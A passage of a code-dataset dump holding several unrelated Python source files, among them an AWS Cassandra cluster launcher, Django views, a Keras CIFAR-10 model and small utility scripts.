type=int, help='in GB, default: 8')\n@click.option('--volume-iops', default=100, type=int, help='for type io1, default: 100')\n@click.option('--no-termination-protection', is_flag=True, default=False)\n@click.option('--scalyr-key')\n@click.argument('cluster_name')\n@click.argument('regions', nargs=-1)\ndef cli(cluster_name: str, regions: list, cluster_size: int, instance_type: str,\n volume_type: str, volume_size: int, volume_iops: int,\n no_termination_protection: bool, scalyr_key: str):\n if not regions:\n raise click.UsageError('Please specify at least one region')\n\n # generate keystore/truststore\n keystore, truststore = generate_certificate(cluster_name)\n\n # Elastic IPs by region\n public_ips = collections.defaultdict(list)\n security_groups = {}\n try:\n allocate_public_ips(regions, cluster_size, public_ips)\n\n # We should have up to 3 seeds nodes per DC\n seed_count = min(cluster_size, 3)\n\n # take first {seed_count} IPs in every region for the seed nodes\n seed_nodes = {}\n for region, ips in public_ips.items():\n seed_nodes[region] = ips[0:seed_count]\n list_ips = [ip['PublicIp'] for ip in seed_nodes[region]]\n info('Our seed nodes in {} are: {}'.format(region, ', '.join(list_ips)))\n\n # Set up Security Groups\n setup_security_groups(cluster_name, public_ips, security_groups)\n\n taupage_amis = find_taupage_amis(regions)\n\n def generate_taupage_user_data() -> str:\n '''\n Generate Taupage user data to start a Cassandra node\n http://docs.stups.io/en/latest/components/taupage.html\n '''\n keystore_base64 = base64.b64encode(keystore)\n truststore_base64 = base64.b64encode(truststore)\n\n # version = get_latest_docker_image_version()\n # registry.opensource.zalan.do/reco/planb-cassandra:2.0.17-no-cass-tools-jamm-0-2-5\n # registry.opensource.zalan.do/reco/planb-cassandra:2.0.17-no-cass-tools\n # registry-write.opensource.zalan.do/reco/planb-cassandra:2.0.17-build-1\n\n all_seeds = [ip['PublicIp'] for region, ips in seed_nodes.items() for ip in ips]\n data = {'runtime': 'Docker',\n 'source': 'registry.opensource.zalan.do/reco/planb-cassandra:2.0.17-build-1',\n 'application_id': cluster_name,\n 'application_version': '1.0',\n 'networking': 'host',\n 'ports': {'7001': '7001',\n '9042': '9042'},\n 'environment': {\n 'CLUSTER_NAME': cluster_name,\n 'CLUSTER_SIZE': cluster_size,\n 'REGIONS': ' '.join(regions),\n 'SEEDS': ','.join(all_seeds),\n 'KEYSTORE': keystore_base64,\n 'TRUSTSTORE': truststore_base64,\n 'ADMIN_PASSWORD': generate_password()\n },\n 'mounts': {\n '/var/lib/cassandra': {\n 'erase_on_boot': True,\n 'partition': '/dev/xvdf',\n 'options': 'noatime,nodiratime'\n }\n },\n 'scalyr_account_key': scalyr_key\n }\n # TODO: add KMS-encrypted keystore/truststore\n\n return data\n\n user_data = generate_taupage_user_data()\n print(user_data)\n taupage_user_data = '#taupage-ami-config\\n{}'.format(yaml.safe_dump(user_data))\n\n # Launch EC2 instances with correct user data\n subnets = get_dmz_subnets(regions)\n\n def launch_instance(region: str, ip: dict, ami: object, subnet_id: str,\n security_group_id: str, node_type: str):\n\n with Action('Launching {} node {} in {}..'.format(node_type, ip['PublicIp'], region)) as act:\n ec2 = boto3.client('ec2', region_name=region)\n\n #\n # Override any ephemeral volumes with NoDevice mapping,\n # otherwise auto-recovery alarm cannot be actually enabled.\n #\n block_devices = []\n for bd in ami.block_device_mappings:\n if 'Ebs' in bd:\n #\n # This has to be our root EBS.\n #\n # If the Encrypted flag is present, we have to delete\n # it even if it matches the actual snapshot setting,\n # otherwise amazon will complain rather loudly.\n #\n # Take a deep copy before deleting the key:\n #\n bd = copy.deepcopy(bd)\n\n root_ebs = bd['Ebs']\n if 'Encrypted' in root_ebs:\n del(root_ebs['Encrypted'])\n\n block_devices.append(bd)\n else:\n # ignore any ephemeral volumes (aka. instance storage)\n block_devices.append({'DeviceName': bd['DeviceName'],\n 'NoDevice': ''})\n\n # make sure our data EBS volume is persisted and encrypted\n data_ebs = {'VolumeType': volume_type,\n 'VolumeSize': volume_size,\n 'DeleteOnTermination': False,\n 'Encrypted': True}\n if volume_type == 'io1':\n data_ebs['Iops'] = volume_iops\n\n #\n # Now add the data EBS with pre-defined device name (it is\n # referred to in Taupage user data).\n #\n block_devices.append({'DeviceName': '/dev/xvdf', 'Ebs': data_ebs})\n\n resp = ec2.run_instances(ImageId=ami.id,\n MinCount=1,\n MaxCount=1,\n SecurityGroupIds=[security_group_id],\n UserData=taupage_user_data,\n InstanceType=instance_type,\n SubnetId=subnet_id,\n BlockDeviceMappings=block_devices,\n DisableApiTermination=not(no_termination_protection))\n\n instance = resp['Instances'][0]\n instance_id = instance['InstanceId']\n\n ec2.create_tags(Resources=[instance_id],\n Tags=[{'Key': 'Name', 'Value': cluster_name}])\n\n # wait for instance to initialize before we can assign an IP address to it\n while True:\n resp = ec2.describe_instances(InstanceIds=[instance_id])\n instance = resp['Reservations'][0]['Instances'][0]\n if instance['State']['Name'] != 'pending':\n break\n time.sleep(5)\n act.progress()\n\n ec2.associate_address(InstanceId=instance_id,\n AllocationId=ip['AllocationId'])\n\n # tag the attached data EBS volume for easier cleanup when testing\n for bd in instance['BlockDeviceMappings']:\n if bd['DeviceName'] == '/dev/xvdf':\n ec2.create_tags(Resources=[bd['Ebs']['VolumeId']],\n Tags=[{'Key': 'Name', 'Value': cluster_name}])\n\n # add an auto-recovery alarm for this instance\n cw = boto3.client('cloudwatch', region_name=region)\n cw.put_metric_alarm(AlarmName='{}-{}-auto-recover'.format(cluster_name, instance_id),\n AlarmActions=['arn:aws:automate:{}:ec2:recover'.format(region)],\n MetricName='StatusCheckFailed_System',\n Namespace='AWS/EC2',\n Statistic='Minimum',\n Dimensions=[{\n 'Name': 'InstanceId',\n 'Value': instance_id\n }],\n Period=60, # 1 minute\n EvaluationPeriods=2,\n Threshold=0,\n ComparisonOperator='GreaterThanThreshold')\n\n # Launch sequence:\n # start all the seed nodes\n total_seed_count = seed_count * len(regions)\n seeds_launched = 0\n for region, ips in seed_nodes.items():\n region_subnets = subnets[region]\n for i, ip in enumerate(ips):\n launch_instance(region, ip,\n ami=taupage_amis[region],\n subnet_id=region_subnets[i % len(region_subnets)],\n security_group_id=security_groups[region]['GroupId'],\n node_type='SEED')\n seeds_launched += 1\n if seeds_launched < total_seed_count:\n info(\"Sleeping for half a minute before launching next SEED node..\")\n time.sleep(30)\n\n # TODO: make sure all seed nodes are up\n\n # add remaining nodes one by one\n # TODO: parallelize by region?\n for region, ips in public_ips.items():\n region_subnets = subnets[region]\n for i, ip in enumerate(ips):\n if i >= seed_count:\n # avoid stating all nodes at the same time\n info(\"Sleeping for half a minute before launching next node..\")\n time.sleep(30)\n launch_instance(region, ip,\n ami=taupage_amis[region],\n subnet_id=region_subnets[i % len(region_subnets)],\n security_group_id=security_groups[region]['GroupId'],\n node_type='NORMAL')\n\n info('Cluster initialization completed successfully!')\n sys.stdout.write('''\nThe Cassandra cluster {cluster_name} was created with {cluster_size} nodes\nin each of the following AWS regions: {regions}\n\nYou can now login to any of the cluster nodes with the superuser\naccount using the following command:\n\n $ cqlsh -u cassandra -p '{admin_password}'\n\nFrom there you can create non-superuser roles and otherwise configure\nthe cluster.\n\nYou might also need to update the Security Groups named {cluster_name}\n(in all regions!) to allow access to Cassandra from your application (port 9042)\nand optionally to allow access to Jolokia (port 8778) and/or\nPrometheus Node Exporter (port 9100) from your monitoring tool.\n'''.format(cluster_size=cluster_size, cluster_name=cluster_name, regions=' '.join(regions),\n admin_password=user_data['environment']['ADMIN_PASSWORD']))\n\n except:\n for region, sg in security_groups.items():\n ec2 = boto3.client('ec2', region)\n info('Cleaning up security group: {}'.format(sg['GroupId']))\n ec2.delete_security_group(GroupId=sg['GroupId'])\n\n for region, ips in public_ips.items():\n ec2 = boto3.client('ec2', region)\n for ip in ips:\n info('Releasing IP address: {}'.format(ip['PublicIp']))\n ec2.release_address(AllocationId=ip['AllocationId'])\n\n raise\n\nif __name__ == '__main__':\n cli()\n","sub_path":"create-cluster.py","file_name":"create-cluster.py","file_ext":"py","file_size_in_byte":18487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"518524833","text":"from bs4 import BeautifulSoup\nfrom sklearn.feature_extraction import DictVectorizer\n\nfrom collections import defaultdict\nfrom charmeleon import Charmeleon\n\nclass HTMLVectorizer():\n\n v = DictVectorizer(sparse=False)\n\n def html_iter(self, files):\n # Build Y = [labels], X = feature matrix\n Y = list()\n X = list()\n\n # Calculate character features for each text node\n charm = Charmeleon()\n\n for f in files:\n soup = BeautifulSoup(open(f))\n\n # Find all text nodes\n text_nodes = soup.find_all(text=True)\n\n # Iterate through text nodes and find annotation labels or label \"None\"\n for text in text_nodes:\n if text.parent is not None:\n node = text.parent\n\n if node.has_attr('annotation'):\n Y.append(node['annotation'])\n else:\n Y.append(\"None\")\n\n features = charm.compute_features(text)\n features['tag_name'] = node.name\n\n X.append(features)\n\n # Return list of character feature vectors + labels\n return [X, Y]\n\n def fit(self, files):\n result = self.html_iter(files)\n X = self.v.fit(result[0])\n Y = result[1]\n return [X,Y]\n\n def fit_transform(self, files):\n result = self.html_iter(files)\n X = self.v.fit_transform(result[0])\n Y = result[1]\n return [X, Y]\n\n def inverse_transform(self, X):\n return self.v.inverse_transform(X)\n\n def transform(self, files):\n result = html_iter(files)\n X = self.v.transform(result[0])\n Y = result[1]\n return [X, Y]","sub_path":"feature-extraction/article_extractor/htmlvectorizer.py","file_name":"htmlvectorizer.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"239279265","text":"from django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom apps.zedutils.forms import FeedbackForm\nfrom apps.zedutils.models import Feedback\nfrom apps.zedutils.utils import get_client_ip\n\ndef feedback(request):\n _dict = {}\n form = FeedbackForm(prefix='feedback')\n _dict['form'] = form\n if request.method == \"POST\" and request.is_ajax():\n try:\n f = Feedback()\n f.message = request.POST.get('msg')\n if request.user.is_authenticated():\n f.user = request.user\n f.email = request.user.email\n else:\n if len(request.POST.get('email')) > 0:\n f.email = request.POST.get('email')\n f.ip = get_client_ip(request)\n f.save()\n return HttpResponse(\"SUCCESS\")\n except :\n return HttpResponse(\"ERROR\")\n return render_to_response('feedback_form.html', _dict, context_instance=RequestContext(request))\n\n@login_required\ndef feedback_list(request):\n if not request.user.is_superuser:\n return HttpResponseRedirect(reverse('home'))\n _dict = {}\n feedback = Feedback.objects.filter(deleted=False)\n _dict['feedback'] = feedback\n\n return render_to_response('feedback_list.html', _dict, context_instance=RequestContext(request))\n\n@login_required\ndef toggle_feedback_read(request):\n if request.method == \"POST\" and request.is_ajax():\n try:\n feedback = Feedback.objects.get(pk=request.POST.get('id'))\n val = request.POST.get('val')\n if val == 'no':\n feedback.read = True\n elif val == 'yes':\n feedback.read = False\n feedback.save()\n return HttpResponse(\"SUCCESS\")\n except :\n return HttpResponse(\"ERROR\")","sub_path":"apps/zedutils/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"270248039","text":"# -*- coding:utf-8 -*-\n# vim:sw=4 ts=4 si et\n\nfrom django.db.models import Count\nfrom salmon.accounts.models import User\nfrom salmon.server.models import Cluster\nfrom salmon.package.models import Package\nfrom salmon.mastersite.common import get_secondday\n\nfrom models import Content\n# Create your views here.\n\n\ndef get_config_content_data(vd, is_online=False,\n selectpro=None,\n confname=None,\n cluster=None,\n server=None,\n publisher=None,\n publishdate=None,\n owner=None,\n creationdate=None,\n description=None):\n content_filters = {'name__icontains': confname}\n\n if owner:\n related_users = User.objects.filter(username__icontains=owner)\n if related_users:\n content_filters['owner__in'] = related_users\n else:\n return []\n if creationdate:\n content_filters['creationdate__range'] = (creationdate, creationdate + 1)\n\n package_filters = {}\n if cluster:\n related_clusters = Cluster.objects.filter(name__icontains=cluster)\n if related_clusters:\n package_filters['slots__server__cluster__in'] = related_clusters\n else:\n return []\n if publisher:\n related_users = User.objects.filter(username__icontains=publisher)\n if related_users:\n package_filters['slots__owner__in'] = related_users\n else:\n return []\n if publishdate:\n package_filters['deployment_tasks__creationdate__range'] = (publishdate, get_secondday(publishdate))\n\n if package_filters:\n related_packages = Package.objects.filter(**package_filters)\n if related_packages:\n content_filters['packages__in'] = related_packages\n else:\n return []\n elif is_online and selectpro != u\"全部\":\n content_filters['online_count__gt'] = 0\n\n content_set = Content.objects.annotate(online_count=Count(\"packages__slots\"))\n if content_filters:\n content_set = content_set.filter(**content_filters)\n else:\n content_set = Content.objects.all()\n content_set = content_set.annotate(deployment_count=\"packages__slots\")\n\n return content_set\n","sub_path":"salmon/config/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"125515167","text":"# coding: utf-8\n# @author: Ross\n# @file: loader.py\n# @time: 2020/01/13\n# @contact: devross@gmail.com\n\nfrom torch.utils.data import Dataset\nimport torch\nimport numpy as np\n\n\nclass PosOOSDataset(Dataset):\n def __init__(self, dataset):\n self.dataset = np.array(dataset)\n\n def __getitem__(self, index: int):\n token_ids, mask_ids, type_ids, label_ids, pos1, pos2, pos_mask= self.dataset[index]\n return (torch.tensor(token_ids, dtype=torch.long),\n torch.tensor(mask_ids, dtype=torch.long),\n torch.tensor(type_ids, dtype=torch.long),\n torch.tensor(pos1),\n torch.tensor(pos2, dtype=torch.long),\n torch.tensor(pos_mask),\n torch.tensor(label_ids, dtype=torch.float32),\n )\n\n def __len__(self) -> int:\n return len(self.dataset)\n","sub_path":"data_utils/pos_tagging_dataset.py","file_name":"pos_tagging_dataset.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"467243953","text":"#!/usr/bin/env python\n\"\"\"\nExports a table as a CSV\n\nUsage:\n ./util/export_csv.py [options]\n\nOptions:\n -h --help Show this text.\n --url URL string to connect to CockroachDB\n --table Name of the table to export\n\"\"\"\n\nfrom docopt import docopt\nfrom connect_with_sqlalchemy import build_engine, build_sqla_connection_string\n\n\ndef get_table(engine, table):\n return engine.execute(\"SELECT * FROM {}\".format(table))\n\n\ndef get_vehicles(engine):\n return engine.execute(\"SELECT * FROM vehicles\")\n\n\ndef print_header(columns):\n header_row = ['\"{}\"'.format(c) for c in columns]\n print(','.join(header_row))\n\n\ndef print_vehicles_row(row):\n row_arr = ['\"{}\"'.format(c) for c in row]\n row_arr[1] = row_arr[1].strip('\"')\n row_arr[2] = row_arr[2].strip('\"')\n row_arr[3] = row_arr[3].strip('\"')\n row_arr[3] = row_arr[3].replace(\"'\", '\"')\n row_arr[3] = \"'{}'\".format(row_arr[3])\n print(\"|\".join(row_arr))\n\n\ndef print_row(row):\n row_arr = ['\"{}\"'.format(c) for c in row]\n print(\"|\".join(row_arr))\n\n\ndef main():\n opts = docopt(__doc__)\n sqla_connection_string = build_sqla_connection_string(opts['--url'])\n engine = build_engine(sqla_connection_string)\n table_name = opts['--table']\n table = get_table(engine, table_name)\n columns = table.keys()\n # print_header(columns)\n if table_name == 'vehicles':\n for row in table:\n print_vehicles_row(row)\n else:\n for row in table:\n print_row(row)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"lab_complete/movr_py_complete/util/export_csv.py","file_name":"export_csv.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"559637976","text":"# Copyright 2021 Intel Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom numba.core import types\n\n\ndef numba_type_to_dpctl_typenum(context, type):\n \"\"\"\n This function looks up the dpctl defined enum values from\n ``DPCTLKernelArgType``.\n \"\"\"\n\n val = None\n if type == types.int32 or isinstance(type, types.scalars.IntegerLiteral):\n # DPCTL_LONG_LONG\n val = context.get_constant(types.int32, 9)\n elif type == types.uint32:\n # DPCTL_UNSIGNED_LONG_LONG\n val = context.get_constant(types.int32, 10)\n elif type == types.boolean:\n # DPCTL_UNSIGNED_INT\n val = context.get_constant(types.int32, 5)\n elif type == types.int64:\n # DPCTL_LONG_LONG\n val = context.get_constant(types.int32, 9)\n elif type == types.uint64:\n # DPCTL_SIZE_T\n val = context.get_constant(types.int32, 11)\n elif type == types.float32:\n # DPCTL_FLOAT\n val = context.get_constant(types.int32, 12)\n elif type == types.float64:\n # DPCTL_DOUBLE\n val = context.get_constant(types.int32, 13)\n elif type == types.voidptr:\n # DPCTL_VOID_PTR\n val = context.get_constant(types.int32, 15)\n else:\n raise NotImplementedError\n\n return val\n","sub_path":"numba_dppy/driver/_helpers.py","file_name":"_helpers.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"561723922","text":"import time\nstart_time = time.time()\n\n# names_1 = BinarySearchTree('M')\n# names_2 = BinarySearchTree('M')\n\n\nnames_dict = {}\n\nf = open('names_1.txt', 'r')\nnames_1 = f.read().split(\"\\n\") # O(n) operation to store names in dictionary , List containing 10000 names\nfor name in names_1:\n names_dict[name] = name\nf.close()\n\nf = open('names_2.txt', 'r')\nnames_2 = f.read().split(\"\\n\") # O(n) operation to store names in list List containing 10000 names\nf.close()\n\nduplicates = []\nfor name in names_2: #O(n) operation to loop through all names in list\n if name in names_dict: #O(1) operation to check if exists in dict\n duplicates.append(name)\n\nend_time = time.time()\nprint (f\"{len(duplicates)} duplicates:\\n\\n{', '.join(duplicates)}\\n\\n\")\nprint (f\"runtime: {end_time - start_time} seconds\")\n\n","sub_path":"names/names.py","file_name":"names.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"6661418","text":"import os\r\nimport sys\r\n\r\n\r\nscript = __file__\r\nscript_path = os.path.dirname(script)\r\nscript_file = os.path.basename(script)[0]\r\nfiles = [f for f in os.listdir(script_path) if script_file in f and '.in' in f]\r\nif '{}-large'.format(script_file) in str(files):\r\n size = 'large'\r\nelif '{}-small'.format(script_file) in str(files):\r\n size = 'small'\r\nelif '{}-test'.format(script_file) in str(files):\r\n size = 'test'\r\nelse:\r\n print('{}-test not found'.format(script_file))\r\n sys.exit()\r\nlatest = sorted(f for f in files if size in f)[-1][:-3]\r\nf = '{}/{}'.format(script_path, latest)\r\ni = open(f + '.in', 'r')\r\no = open(f + '.out', 'w')\r\nprint(f)\r\nT = int(i.readline())\r\n\r\n# https://code.google.com/codejam/contest/6254486/dashboard#s=p2\r\n# Problem C. Coin Jam\r\n\r\nfrom itertools import *\r\nimport numpy\r\n\r\n\r\ndef primesfrom2to(n):\r\n sieve = numpy.ones(n // 3 + (n % 6 == 2), dtype=numpy.bool)\r\n sieve[0] = False\r\n for i in range(int(n ** 0.5) // 3 + 1):\r\n if sieve[i]:\r\n k = 3 * i + 1 | 1\r\n sieve[(k * k) // 3::2 * k] = False\r\n sieve[(k * k + 4 * k - 2 * k * (i & 1)) // 3::2 * k] = False\r\n return numpy.r_[2, 3, (3 * numpy.nonzero(sieve)[0] + 1) | 1]\r\n\r\n\r\nprimes = primesfrom2to(100)\r\n\r\nfor x in range(T):\r\n o.write('Case #{}:'.format(x + 1))\r\n N, J = map(int, i.readline().split())\r\n for j in product('01', repeat=int(N) - 2):\r\n y = '1{}1'.format(''.join(j))\r\n divs = []\r\n for base in range(2, 11):\r\n for d in primes:\r\n if not int(y, base) % d:\r\n divs.append(str(d))\r\n break\r\n else:\r\n break\r\n else:\r\n J -= 1\r\n o.write('\\n{} {}'.format(y, ' '.join(divs)))\r\n if J == 0:\r\n break\r\n\r\ni.close()\r\no.close()\r\n","sub_path":"Google-Code-Jam/2016-Q/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"189207999","text":"#Time Complexity:O(m*n),m = length of the coins arrayl,n = amount\n#Space Coplexity:O(n)\n#Ran successfully on Leetcode:Yes\n#Difficulties faced: Understanding dynamic programming\n\n#dp[i] will be storing the number of solutions for \n# value i. We need n+1 rows as the table is constructed \n# in bottom up manner using the base case (n = 0) \n# Initialize all dp values as 0.\n\n\nclass Solution:\n def coinChange(self, coins: List[int], amount: int) -> int:\n dp = [0]*(amount+1)\n if not amount:\n return 0\n # Pick all coins one by one and update the dp[] values \n # after the index greater than or equal to the value of the \n # picked coin \n for i in range( amount+1):\n if i in coins:\n dp[i] = 1#Base case (If given value is 0) \n continue\n min_coins = float(\"inf\")\n for coin in coins:\n if i-coin >= 0:\n min_coins = min(dp[i-coin], min_coins)\n dp[i] = min_coins+1\n if dp[-1] == float(\"inf\"):\n return -1\n return dp[-1]\n \n","sub_path":"coinChange.py","file_name":"coinChange.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"652836847","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 18 17:53:41 2021\n\n@author: 알파제로를 분석하며 배우는 인공지능\n\"\"\"\n\n#%%\n\n# 3-3-4 패키지 임포트\n\n# 패키지 임포트\nfrom tensorflow.keras.datasets import cifar10\nfrom tensorflow.keras.layers import Activation, Dense, Dropout, Conv2D, Flatten, MaxPool2D\nfrom tensorflow.keras.models import Sequential, load_model\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.utils import to_categorical\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# 데이터 세트 준비\n(train_images, train_labels) , (test_images, test_labels) = cifar10.load_data()\n\n# 데이터 세트 형태 확인\nprint(train_images.shape)\nprint(train_labels.shape)\nprint(test_images.shape)\nprint(test_labels.shape)\n\n# 데이터 세트 이미지 확인\nfor i in range(10):\n plt.subplot(2,5,i+1)\n plt.imshow(train_images[i])\nplt.show()\n\n# 데이터 세트 라벨 확인\nprint(train_labels[0:10])\n\n\n#%%\n\n# 3-3-6 데이터 세트 전처리 및 확인\n\n# 데이터 세트 이미지 전처리\ntrain_images = train_images.astype('float32') / 255.0\ntest_images = test_images.astype('float32') / 255.0\n\n# 데이터 세트 이미지 전처리 후 형태 확인\nprint(train_images.shape)\nprint(test_images.shape)\n\n# 데이터 세트 라벨 전처리\ntrain_labels = to_categorical(train_labels,10)\ntest_labels = to_categorical(test_labels,10)\n\n# 데이터 세트 라벨 전처리 후 형태 확인\nprint(train_labels.shape)\nprint(test_labels.shape)\n\n#%%\n\n# 3-3-7 모델 생성\n\n# 모델 생성\nmodel = Sequential()\nmodel.add(Conv2D(32, (3,3), activation='relu', padding='same', input_shape=(32,32,3)))\nmodel.add(Conv2D(32, (3,3), activation='relu', padding='same'))\nmodel.add(MaxPool2D(pool_size = (2,2)))\nmodel.add(Dropout(0.25))\n\n# Conv->Conv -> Pool -> Dropout\nmodel.add(Conv2D(64,(3,3), activation='relu', padding='same'))\nmodel.add(Conv2D(64,(3,3), activation='relu', padding='same'))\nmodel.add(MaxPool2D(pool_size=(2,2)))\n\n# Flatten->Dense->Dropout->Dense\nmodel.add(Flatten())\nmodel.add(Dense(512, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(10, activation='softmax'))\n\n# 3-3-8 컴파일\n\nmodel.compile(loss='categorical_crossentropy', optimizer=Adam(lr=0.001), metrics=['acc'])\n\n# 3-3-9 학습\n# 학습\nhistory = model.fit(train_images, train_labels, batch_size = 500, epochs=30, validation_split=0.1)\n\n#%%\n\n# 3-3-10 모델 저장과 로드\n\nmodel.save('3-3-convolution.h5')\n\n# 그래프 표시\nplt.plot(history.history['acc'],label='acc')\nplt.plot(history.history['val_acc'], label='val_acc')\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\nplt.legend(loc='best')\nplt.show()\n\n#%%\n\n# 3-3-12 평가\ntest_loss, test_acc = model.evaluate(test_images, test_labels)\nprint('loss: {:.3f}\\nacc: {:.3f}'.format(test_loss, test_acc))\n\n# 3-3-13 추론\n# 추론할 이미지 표시\n\nfor i in range(10):\n plt.subplot(2,5,i+1)\n plt.imshow(test_images[i])\nplt.show()\n\n# 추론한 라벨 표시\nimport random \nn = random.sample(range(1,10001),10)\ntest_predictions = model.predict(test_images[n])\ntest_predictions = np.argmax(test_predictions, axis=1)\nlabels = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']\nprint([labels[n] for n in test_predictions])\ntemp = np.argmax(test_labels[n],axis=1)\nprint([labels[n] for n in temp])\n\n","sub_path":"AlphaZero_book/chap3/3-3.py","file_name":"3-3.py","file_ext":"py","file_size_in_byte":3329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"496323707","text":"\nimport re\nfrom uuid import UUID\n\ndef getUrlParts(url):\n expr = r\"//(?P(\\w|\\-)+\\.(\\w|\\-)+\\.(\\w|\\-)+)/(?P\\w*)/(?P\\w*)\\?\"\n matches = re.search(expr, url)\n base = matches.group(\"base\")\n control = matches.group(\"controller\")\n action = matches.group(\"action\")\n tup = (base, control, action)\n return tup\n\ndef getQueryParameters(url):\n lists = re.findall(r\"([\\w\\.\\-]*)=([\\w\\.\\-]*)&*\",url)\n return lists\n\ndef getSpecial(s, letter):\n expr = r\"\\b({0}\\w*[^{0}\\W]|[^{0}\\W]\\w*{0})\\b\".format(letter)\n match = re.findall(expr, s, re.I)\n return match\n\ndef getRealMAC(s):\n expr = r\"(((([a-fA-F0-9]{2})(-|:)){5})([a-fA-F0-9]{2}))\"\n match = re.search(expr, s, re.I)\n if match:\n return match.group(0)\n else:\n return None\n\n\ndef getRejectedEntries():\n lists = []\n with open(\"Employees.txt\", 'r') as file:\n data = file.readlines()\n for line in data:\n expr = r\"^((\\w+\\s\\w+)|(\\w+,\\s\\w+))[,; ]+$\"\n match = re.search(expr, line)\n if match:\n x = match.groups()\n test = x[0]\n if ',' in test:\n expr = r\"\\w+\"\n m = re.findall(expr, test)\n fo = \"{0} {1}\".format(m[1], m[0])\n lists.append(fo)\n else:\n lists.append(str(test))\n return sorted(lists)\n\ndef getEmployeesWithStates():\n dic={}\n with open(\"Employees.txt\", 'r') as f:\n data = f.readlines()\n for line in data:\n expr = r\"^(([a-zA-z]+\\s[a-zA-z]+)|([a-zA-z]+,\\s[a-zA-z]+)).*?([a-zA-Z ]+)$\"\n match = re.search(expr, line)\n if match:\n x = match.groups()\n test = x[0]\n # print(test)\n match2 = re.search(r\"(?P[A-Za-z]+),\\s(?P[A-Za-z]+)\", str(test))\n value2 = x[3]\n\n if match2:\n last = match2.group(\"last\")\n first = match2.group(\"first\")\n name = first + \" \" + last\n else:\n name =str(test)\n\n dic[name] = value2\n return dic\n\nif __name__ == \"__main__\":\n #url = \"http://www.purdue.edu/Home/Calendar?Year=2016&Month=September&Semester=Fall\"\n #print(getUrlParts(url))\n #url = \"http://www.google.com/Math/Const?Pi=3.14&Max_Int=65536&What_Else=Not-Here\"\n #print(getQueryParameters(url))\n #s = \"The TART program runs on Tuesdays and Thursdays, but it does not start until next week.\"\n #print(getSpecial(s, 't'))\n #s = 'An example of a MAC address is 58:1C:0A:6E:39:4D.'\n #print(getRealMAC(s))\n #print(finddata())\n print(getRejectedEntries())\n #print(getEmployeesWithIDs())\n #print(getEmployeesWithStates())\n","sub_path":"ECE 364/Prelab06/regexApp.py","file_name":"regexApp.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"258496296","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\nimport json\nimport re\n\n\ndef list_to_dict(headers):\n d = {}\n for h in headers:\n if(h[:h.find(\": \")].strip() in [\"Content-Length\",\"Host\",\"Connection\",\"accept\",\"User-Agent\",\"Content-Type\",\"Origin\",\"Referer\",\"Accept-Encoding\",\"Cookie\",\"Accept-Language\"]):\n continue\n d[h[:h.find(\": \")].strip()] = h[h.find(\": \")+1:].strip()\n return d\n\ndef str_to_dic(data):\n d = {}\n dl = data.split(\"&\")\n for i in dl:\n d[i.split(\"=\")[0]]=i.split(\"=\")[1]\n return d\n\n\ndef make_code():\n\n with open(\"demo.txt\",\"r\") as f:\n content = f.read()\n\n\n request_line = content.split(\"\\n\\n\")[0]\n request_headers = request_line.split('\\n')[1:]\n request_line = request_line.split('\\n')[0]\n request_content = content.split(\"\\n\\n\")[1]\n r = {}\n method = request_line.split(\" \")[0].strip()\n url = request_line.split(\" \")[1].strip().split(\"://\")[1].strip()\n uri = url[url.find('/'):]\n data=\"\"\n if \"?\" in uri:\n data = uri[uri.find('?') + 1:]\n uri = uri[:uri.find('?')]\n headers = list_to_dict(request_headers)\n r[\"func_name\"] = uri[uri.rfind(\"/\")+1:]\n r[\"method\"]=method\n r[\"uri\"] = uri\n r[\"headers\"] = headers\n\n req = '''def test_{func_name}(pub_data):\n method = \"{method}\" #请求方法,全部大写\n feature = \"用户模块\" # allure报告中一级分类\n story = '用户登录' # allure报告中二级分类\n title = \"全字段正常流_1\" # allure报告中用例名字\n uri = \"{uri}\" # 接口地址\n headers = {headers}\n status_code = 200 # 响应状态码\n expect = \"\" # 